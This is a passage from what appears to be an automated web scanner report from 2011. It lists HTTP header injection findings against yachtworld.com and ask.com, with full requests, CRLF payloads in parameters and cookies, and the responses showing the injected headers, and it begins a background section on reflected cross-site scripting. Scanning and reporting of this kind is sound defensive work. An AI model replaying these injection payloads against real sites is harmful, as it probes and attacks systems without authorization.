0e475e20fcd&">here</a>

2.9. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload 67044%0d%0a3831b3bd0d0 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=67044%0d%0a3831b3bd0d0&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:40 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0
&id=2267335&lang=en&slim=pp279757&
Content-Length: 175
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0&id=2267335&lang=en&slim=pp279757&">here</a>

2.10. https://www.yachtworld.com/ [savedLabel0 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.yachtworld.com
Path:   /

Issue detail

The value of the savedLabel0 cookie is copied into the Set-Cookie response header. The payload ab4ad%0d%0a2d954fcf23f was submitted in the savedLabel0 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=ab4ad%0d%0a2d954fcf23f; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:22 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=ab4ad
2d954fcf23f
; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=24-32%20ft,regulator,    Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>



...[SNIP]...

2.11. https://www.yachtworld.com/ [savedLabel1 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.yachtworld.com
Path:   /

Issue detail

The value of the savedLabel1 cookie is copied into the Set-Cookie response header. The payload 278e2%0d%0a3167851441c was submitted in the savedLabel1 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=278e2%0d%0a3167851441c; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=278e2
3167851441c
; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>



...[SNIP]...

2.12. http://wzus1.ask.com/i/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ccd1c%0d%0a07743971c78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ccd1c%0d%0a07743971c78/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0D47D9451CCD32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=0E49DA4619CD32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/ccd1c
07743971c78
/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 437
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/ccd1c
07743971c78/i.gif?t
...[SNIP]...

2.13. http://wzus1.ask.com/i/i.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4af04%0d%0ad83a2a5f4ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /i/4af04%0d%0ad83a2a5f4ce?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0743D74113CE32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=064AD0401ECE32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/4af04
d83a2a5f4ce
?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 433
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/4af04
d83a2a5f4ce?t=S&a
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 578 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such 